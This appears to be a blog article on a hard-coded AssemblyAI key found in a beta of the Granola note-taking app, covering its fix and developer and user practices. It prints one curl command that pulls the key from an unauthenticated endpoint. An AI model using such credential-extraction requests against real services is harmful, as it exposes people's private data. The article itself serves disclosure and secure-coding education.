The Hidden Dangers of AI Note-Taking Apps: A Cautionary Tale
How a Hardcoded API Key in Granola AI Exposed Users’ Private Meeting Transcripts
In early 2025, a critical security flaw was discovered in the beta version of Granola, an AI-powered note-taking application. This vulnerability involved a hard-coded API key within the app’s code, potentially allowing unauthorized access to users’ private meeting transcripts. Although the issue was promptly addressed before the public release, it underscores significant concerns regarding the security practices of AI applications handling sensitive data.
🔍 The Vulnerability: Hard-Coded API Key Exposure
Security researchers identified that Granola’s macOS desktop client contained a hard-coded API key for AssemblyAI, the transcription service used by the app. This key was accessible through an unauthenticated endpoint, enabling potential attackers to retrieve it with a simple cURL request:
curl -X POST https://api.granola.ai/v1/get-feature-flags \
-H "X-Client-Version: 5.226.0" | jq '.[] | select(.feature=="assembly_key")'
With this key, an attacker could access the /transcript API endpoint, downloading text transcripts of other users’ meetings without authentication or user interaction. Notably, audio recordings remained inaccessible, limiting the scope of potential data exposure.
🛠️ Response and Mitigation
Upon disclosure, Granola’s development team acted swiftly:
Key Revocation: The exposed API key was revoked within minutes of the report.
Endpoint Securing: The vulnerable endpoint was patched to prevent unauthorized access.
Security Enhancements: The app’s feature-flag delivery system was updated to use signed, short-lived tokens, reducing the risk of similar vulnerabilities in the future.
These measures were implemented before the app’s general release, ensuring that the majority of users were not affected.
📈 Broader Implications for AI Applications
The incident with Granola highlights a pervasive issue in the development of AI applications: the handling of sensitive data. As AI tools increasingly integrate into workflows, capturing audio, video, and textual data, the potential impact of security lapses grows.
Investments in AI meeting-assistant startups have surged, with more than $800 million raised in recent years. Many of these applications rely on third-party transcription services, emphasizing the need for robust security protocols to protect user data.
🧠 Best Practices for Users and Developers
For Users:
Assume Potential Exposure: Treat any recorded information as potentially accessible to unauthorized parties.
Limit Sensitive Discussions: Avoid discussing confidential topics in environments where AI transcription tools are active.
Regularly Update Applications: Ensure that AI tools are kept up-to-date to benefit from the latest security patches.
For Developers:
Avoid Hard-Coding Credentials: Implement secure methods for managing API keys and other sensitive information.
Conduct Regular Security Audits: Periodically review codebases for potential vulnerabilities.
Implement Short-Lived Tokens: Use tokens with limited lifespans to minimize the window of opportunity for potential exploits.
But honestly, do you really need all these note-takers? My best recommendation is to avoid them completely.
🔍 TL;DR Summary
Issue: Granola’s beta version contained a hard-coded API key, exposing user transcripts.
Impact: Limited to TestFlight users; no audio data was compromised.
Resolution: The vulnerability was promptly addressed before public release.
Takeaway: The incident underscores the importance of secure credential management in AI applications handling sensitive data.